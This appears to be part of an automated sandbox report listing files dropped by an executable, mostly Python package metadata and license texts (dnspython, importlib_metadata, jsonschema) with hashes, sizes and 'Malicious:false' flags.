                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2997248
                                                                                                                                                                                                          Entropy (8bit):6.677429146317825
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:/xVwASOJGtlqImIU6ipWxOMjB0EZsrU5J0M21SEWPWVWcDcw8xD1XtT2s9mPoOon:Gh+YjmwdkE56Hlw19fOoxr
                                                                                                                                                                                                          MD5:4C0AD2EB9D030A088D00E90D2C57CBE9
                                                                                                                                                                                                          SHA1:83710A36227CE0A277094C902F15A8AA365CEC18
                                                                                                                                                                                                          SHA-256:DEC59340C5854502551980C0FF1E013897D68BE237E7C38BA9EE80C96D3EF7CD
                                                                                                                                                                                                          SHA-512:018E7236F9FE76EF124FF0B65D8832C47480BD31B40F435163566706CAFAA326B5B234024C08AFE80262B87C00310DC6BFA175A36C9F9D0D9A77040998F72F73
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1905152
                                                                                                                                                                                                          Entropy (8bit):6.1897829252472
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:ZGZt2Fr8pA701MwBv/5dcuJ4xNhY5sUQHoxJWpt:ew
                                                                                                                                                                                                          MD5:4DA297B15026197AB45CB5EADD60D2DF
                                                                                                                                                                                                          SHA1:DAC6196E00A505F79156975866C7CA9389AC07EE
                                                                                                                                                                                                          SHA-256:FDC01F1C3EB583F060C8CC2BE5753DA86B55C5672174BA2EE9876E1BBCD54856
                                                                                                                                                                                                          SHA-512:C3CC8BA8FEAD48A6D58BB8E35E9F2C656C2C3433E1BD8CD4EB8726E9E9644345BDD2599A95B82111CFF6D9D74C48BC6DB7E91594DD5BC92D865A104ECECC2AEC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1526
                                                                                                                                                                                                          Entropy (8bit):5.04933524233974
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:RICjmq6509iueAc4PR3qaw/e0sCb5/kos9+ncZPRnA+yF3ew:6CKtYiuDVtqn/etI5u+ni9AtF3ew
                                                                                                                                                                                                          MD5:5AF50906B5929837F667DFE31052BD34
                                                                                                                                                                                                          SHA1:66DB5E89FE8FE8E61165A511E71966E84B6B0102
                                                                                                                                                                                                          SHA-256:C3EA3FF5654B329C19D3BC5F7481AF623C3DDED4A6145585499F843AD3D741CD
                                                                                                                                                                                                          SHA-512:21648D28A0E86E18BA35A5CE313017F9A11888ECBA28EA113ACD198F58D61CAE866B98072AA466E2A18731A9888C5A14FC4D0CE295F0E24C86EE5D30CC099B14
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:ISC License..Copyright (C) Dnspython Contributors..Permission to use, copy, modify, and/or distribute this software for.any purpose with or without fee is hereby granted, provided that the.above copyright notice and this permission notice appear in all.copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL.WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE.AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL.DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR.PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER.TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR.PERFORMANCE OF THIS SOFTWARE.....Copyright (C) 2001-2017 Nominum, Inc..Copyright (C) Google Inc...Permission to use, copy, modify, and distribute this software and its.documentation for any purpose with or without fee is hereby granted,.provided that the above copyright notice and
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4883
                                                                                                                                                                                                          Entropy (8bit):5.112610317572209
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:DKnajmPkK4A3EeYIpV48w1+Y0tswkGFXEPA6/Y7hh0HkYlUrNm:G4A3EeYIpV43wRsEFmA6/Qh0j
                                                                                                                                                                                                          MD5:600A3B4330D5C8EE0BCCED5699FD6F35
                                                                                                                                                                                                          SHA1:38409EB7B64F69D0D8B5CF2B45A60BD2932131B2
                                                                                                                                                                                                          SHA-256:A87C9AD9C6B8E7181845339040E9544520AB80E46332B7D50EC2AE90501D58AB
                                                                                                                                                                                                          SHA-512:F46A8F459B0F7AB3B18A07E4125A585AFBA3D5700884729642398A2FC1D2C2677ED612EF446DE54E31171C7A8D049833FB67C14ECFC01DC9FDD770D1281A13AE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: dnspython.Version: 2.2.1.Summary: DNS toolkit.Home-page: https://www.dnspython.org.License: ISC.Author: Bob Halley.Author-email: halley@dnspython.org.Requires-Python: >=3.6,<4.0.Classifier: License :: OSI Approved.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Provides-Extra: curio.Provides-Extra: dnssec.Provides-Extra: doh.Provides-Extra: idna.Provides-Extra: trio.Provides-Extra: wmi.Requires-Dist: cryptography (>=2.6,<37.0); extra == "dnssec".Requires-Dist: curio (>=1.2,<2.0); extra == "curio".Requires-Dist: h2 (>=4.1.0); (python_full_version >= "3.6.2") and (extra == "doh").Requires-Dist: httpx (>=0.21.1); (python_full_version >= "3.6.2") and (extra == "doh").Requires-Dist: idna (>=2.1,<4.0); extra == "idna"
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17957
                                                                                                                                                                                                          Entropy (8bit):5.768816465057231
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:S2Dd8Q1nL7Hzxm86sdplWg0WmDVlsj5lLiJCFvl25kHhkZK0QJN3Tis41hPFr5pA:XOpTBycal23H0
                                                                                                                                                                                                          MD5:AB4F420F02C46F5DE635618A574B443A
                                                                                                                                                                                                          SHA1:1F527351E77259E142DBD68BA08A545D36145615
                                                                                                                                                                                                          SHA-256:15CCA66D051EA78066F55B9615E51DDD268BACF06E4D03FD86A04025D0D68CA5
                                                                                                                                                                                                          SHA-512:98B0DD99BEC6F4DE50F550176B59A5E03988C2D5B562C725EEA2EF50CCA19E7995D08E3A57885FA3FD076BDA8068353D58CF76FDE866243786DA1B39AEC894A5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:dns/__init__.py,sha256=Tnvxutf2E4hCu2RMU7ADmiVnqOikSWxgCcSJ9xuR-v4,1597..dns/__pycache__/__init__.cpython-38.pyc,,..dns/__pycache__/_asyncbackend.cpython-38.pyc,,..dns/__pycache__/_asyncio_backend.cpython-38.pyc,,..dns/__pycache__/_curio_backend.cpython-38.pyc,,..dns/__pycache__/_immutable_attr.cpython-38.pyc,,..dns/__pycache__/_immutable_ctx.cpython-38.pyc,,..dns/__pycache__/_trio_backend.cpython-38.pyc,,..dns/__pycache__/asyncbackend.cpython-38.pyc,,..dns/__pycache__/asyncquery.cpython-38.pyc,,..dns/__pycache__/asyncresolver.cpython-38.pyc,,..dns/__pycache__/dnssec.cpython-38.pyc,,..dns/__pycache__/e164.cpython-38.pyc,,..dns/__pycache__/edns.cpython-38.pyc,,..dns/__pycache__/entropy.cpython-38.pyc,,..dns/__pycache__/enum.cpython-38.pyc,,..dns/__pycache__/exception.cpython-38.pyc,,..dns/__pycache__/flags.cpython-38.pyc,,..dns/__pycache__/grange.cpython-38.pyc,,..dns/__pycache__/immutable.cpython-38.pyc,,..dns/__pycache__/inet.cpython-38.pyc,,..dns/__pycache__/ipv4.cpython-38.pyc,,..dn
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):83
                                                                                                                                                                                                          Entropy (8bit):4.608262817474207
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeXLR1hRIsP+tPCCfA5I:RtL1HRWBB3
                                                                                                                                                                                                          MD5:64322D7290E1BA514F9DE548E3F03673
                                                                                                                                                                                                          SHA1:0739047EEA2ADC0C72FA36135E17D2BDA3FB9E19
                                                                                                                                                                                                          SHA-256:0C0F3AFE1E10C30CC6791A33EB6A35B2F62DE641845E9A144EE4EDC33A136F7D
                                                                                                                                                                                                          SHA-512:635803514110CE492643B35869F65E5CE48821AED187D6F40030C31200EE865CF86D020BC0EE8653A33E0F5BC59A5DD1EAF9E8DFAFE53A91E165812566DA836D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: poetry 1.0.8.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11358
                                                                                                                                                                                                          Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                          MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                          SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                          SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                          SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4690
                                                                                                                                                                                                          Entropy (8bit):4.998942177281955
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:DxIZSaChm1gR9GDbHRoie7QdnzJGc+fFZpDN00x2jZ2SBXZJSwTE:DhmqfGDbHRoiOQdnlz+TP0vJHJSwTE
                                                                                                                                                                                                          MD5:C06F5342FD3F57A2307C4A0E67D3B41A
                                                                                                                                                                                                          SHA1:1A9C1A56A16E8B0975648FDCAD6983C6B04A3D3B
                                                                                                                                                                                                          SHA-256:138CF970A8F276EED118A6C6BE6F3BEAF1B72F185DE7939C5C3846A246BB76B4
                                                                                                                                                                                                          SHA-512:8FBEDC1F877EC956A81F08C717C1111C75C36F355D86BBE1B0577C66D4A79C80F155B85658FCCCC99A95CB71564EFE41CA65EB8682E2D0B603DBD20D04A21F5A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 7.1.0.Summary: Read metadata from Python packages.Home-page: https://github.com/python/importlib_metadata.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: perf.Requires-Dist: ipython ; extra == 'perf'.Provi
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2254
                                                                                                                                                                                                          Entropy (8bit):5.62574569796933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:CnuXR29Cf5l/g57zXY0Xzeom9pvJq/fwJOfYrBfnJ/V4zN/3WJV:9XDngN5zeRDJsoIYrBfJ/6z9qV
                                                                                                                                                                                                          MD5:A9233E27857D02096B41E4C2D8C13775
                                                                                                                                                                                                          SHA1:C9A2948256D50B24B18FCB91FADBF43CFDA4058F
                                                                                                                                                                                                          SHA-256:C18572F8E48C6BBAF87B70D08408D7009B65B8576F36C38BA08F7B5C5DE1D5CF
                                                                                                                                                                                                          SHA-512:F8045879EC7EDF4F778BD081BDD587F0025CF9191820DCFD6959DEF4081D2EE794D8F23BF7D4E98E1E7C39049C4171938BED6DBF1AA42EAC923D5962552C906C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:importlib_metadata-7.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-7.1.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-7.1.0.dist-info/METADATA,sha256=E4z5cKjydu7RGKbGvm876vG3Lxhd55OcXDhGoka7drQ,4690..importlib_metadata-7.1.0.dist-info/RECORD,,..importlib_metadata-7.1.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_metadata-7.1.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=lAFrEbJHarqSCdkubZebZSDAe20ES_h-ZFqVyv4bn8Y,34302..importlib_metadata/__pycache__/__init__.cpython-38.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-38.pyc,,..importlib_metadata/__pycache__/_collections.cpython-38.pyc,,..importlib_metadata/__pycache__/_compat.cpython-38.pyc,,..importlib_metadata/__pycache__/_functools.cpython-38.pyc,,..importlib_metadata/__pycache__/_itertools.cpython-38.pyc,,..importlib
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):92
                                                                                                                                                                                                          Entropy (8bit):4.812622295095324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                          MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                          SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                          SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                          SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19
                                                                                                                                                                                                          Entropy (8bit):3.536886723742169
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                          MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                          SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                          SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                          SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:importlib_metadata.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7879
                                                                                                                                                                                                          Entropy (8bit):5.159665568881749
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:iFpsu6sMydbuUsPWb3Gjq+PgLoR6IZ+LkOcWtNzhbQId:iFpsBsFd0PWbWj/PgLoR6IZ+LkOcWtN/
                                                                                                                                                                                                          MD5:5B8DCB3164F7532B460A852AC7AD6625
                                                                                                                                                                                                          SHA1:B940C2B73F418A5E375C67E3EEECFD3EED509679
                                                                                                                                                                                                          SHA-256:6270C4B3E8FA4B802DFC5AB9E2EECFA9F606E20413F04E67AE9F2FBB63D7797C
                                                                                                                                                                                                          SHA-512:DD8A7D57955A6235AE70CD7DBE0F1B130AC5EFFE4ECD396FDB4CBE6F1B008F5FFE3C0BA3AF62AB3886AAAFAE2C1C7A60A929D0410BA64A667998A3D6D39B621A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: jsonschema.Version: 4.17.3.Summary: An implementation of JSON Schema validation for Python.Project-URL: Homepage, https://github.com/python-jsonschema/jsonschema.Project-URL: Documentation, https://python-jsonschema.readthedocs.io/.Project-URL: Issues, https://github.com/python-jsonschema/jsonschema/issues/.Project-URL: Funding, https://github.com/sponsors/Julian.Project-URL: Tidelift, https://tidelift.com/subscription/pkg/pypi-jsonschema?utm_source=pypi-jsonschema&utm_medium=referral&utm_campaign=pypi-link.Project-URL: Changelog, https://github.com/python-jsonschema/jsonschema/blob/main/CHANGELOG.rst.Project-URL: Source, https://github.com/python-jsonschema/jsonschema.Author: Julian Berman.Author-email: Julian+jsonschema@GrayVines.com.License: MIT.License-File: COPYING.Keywords: data validation,json,jsonschema,validation.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved ::
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):6544
                                                                                                                                                                                                          Entropy (8bit):5.678342858780333
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:sKXUWSTkxuR5a0KwOsfac4s7ivJvYdDZzQw9SGp4VjHJXRyVn4U1pkwsryTj7J:sKX58TK5sCc4s4JYQwgGp4QVd
                                                                                                                                                                                                          MD5:D0FD37948E7E4FCACEC42C2FC9789909
                                                                                                                                                                                                          SHA1:C90EEB80F7BC15549E5B9436B063972037CB1EA3
                                                                                                                                                                                                          SHA-256:409E0EF8F5612B42656CB1A974AACE38233BC7DEB9F8C533270E6416AA6EF0D1
                                                                                                                                                                                                          SHA-512:2798DFDB6966B5352E6C1EFD5D5143D6393577B319BF9A883D8FEA27C7C4C79648802F9B74B679FC023AD6A8DEF99EF3EC0D9BBBAF0042C51F45E19788DCC919
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:../../Scripts/jsonschema.exe,sha256=ydmRg4xKvTP36E3PoFjw6wAqqw6QNJqlroozp6J8-ys,107860..jsonschema-4.17.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jsonschema-4.17.3.dist-info/METADATA,sha256=YnDEs-j6S4At_Fq54u7PqfYG4gQT8E5nrp8vu2PXeXw,7879..jsonschema-4.17.3.dist-info/RECORD,,..jsonschema-4.17.3.dist-info/WHEEL,sha256=NaLmgHHW_f9jTvv_wRh9vcK7c7EK9o5fwsIXMOzoGgM,87..jsonschema-4.17.3.dist-info/entry_points.txt,sha256=vO7rX4Fs_xIVJy2pnAtKgTSxfpnozAVQ0DjCmpMxnWE,51..jsonschema-4.17.3.dist-info/licenses/COPYING,sha256=T5KgFaE8TRoEC-8BiqE0MLTxvHO0Gxa7hGw0Z2bedDk,1057..jsonschema/__init__.py,sha256=FRdJDXN8-AFk-Fj1qclckQsZNeGQB__r_QuMjtRoze4,2187..jsonschema/__main__.py,sha256=Sfz1ZNeogymj_KZxq6JXY3F6O_1v28sLIiskusifQ5s,40..jsonschema/__pycache__/__init__.cpython-38.pyc,,..jsonschema/__pycache__/__main__.cpython-38.pyc,,..jsonschema/__pycache__/_format.cpython-38.pyc,,..jsonschema/__pycache__/_legacy_validators.cpython-38.pyc,,..jsonschema/__pycache__/_types.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):87
                                                                                                                                                                                                          Entropy (8bit):4.6432018017663745
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeXAaCQvhP+tPCCfA5I:Rt2PQvhWBB3
                                                                                                                                                                                                          MD5:A1FF6DEE0A88BA5E61C8411AA9D78EB2
                                                                                                                                                                                                          SHA1:320108ABC127939DE69551A519CF9CBE73ED37FC
                                                                                                                                                                                                          SHA-256:35A2E68071D6FDFF634EFBFFC1187DBDC2BB73B10AF68E5FC2C21730ECE81A03
                                                                                                                                                                                                          SHA-512:514589FFE35191A80B168CCA962F0A2A22F3EB7E2F3BF40B417370E817E01C9C108DCAE28132B61DF92EA5A38456527379DAA747D62C1574EA52A58F1739D887
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: hatchling 1.11.1.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):51
                                                                                                                                                                                                          Entropy (8bit):4.176725833393184
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:1PWQhEFYFPo8ELTi:1PHEFoPHELTi
                                                                                                                                                                                                          MD5:095614C840316FB033B6B246EBC5A437
                                                                                                                                                                                                          SHA1:EF93164BFFE5ED7A6AABC557DB6CAB721008E911
                                                                                                                                                                                                          SHA-256:BCEEEB5F816CFF1215272DA99C0B4A8134B17E99E8CC0550D038C29A93319D61
                                                                                                                                                                                                          SHA-512:BA38857A744185231613871953DD40152406B3F3BA3434694C2184BD6A3839094E93D56B189AEE1BD0C9F67DA22D84C3E706F16F9A794CDA3B9F759B590FF2D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[console_scripts].jsonschema = jsonschema.cli:main.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1057
                                                                                                                                                                                                          Entropy (8bit):5.104212052457223
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:d3rmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:laJHlxE35QHOs5exm3ogF5n
                                                                                                                                                                                                          MD5:7A60A81C146EC25599A3E1DABB8610A8
                                                                                                                                                                                                          SHA1:2DE1A0A3674903238A664ACE5D3ACC66A7D546C7
                                                                                                                                                                                                          SHA-256:4F92A015A13C4D1A040BEF018AA13430B4F1BC73B41B16BB846C346766DE7439
                                                                                                                                                                                                          SHA-512:FBCCF0F7378F4A081A87CB26532E1F5BE599D781C958C85BFC8F7BBE356644A82826259F9871701E01E6232732E0B651E6171B8DE019DFE07B48F28CA017FD62
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Copyright (c) 2013 Julian Berman..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH TH
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3381792
                                                                                                                                                                                                          Entropy (8bit):6.094908167946797
                                                                                                                                                                                                          Encrypted:false
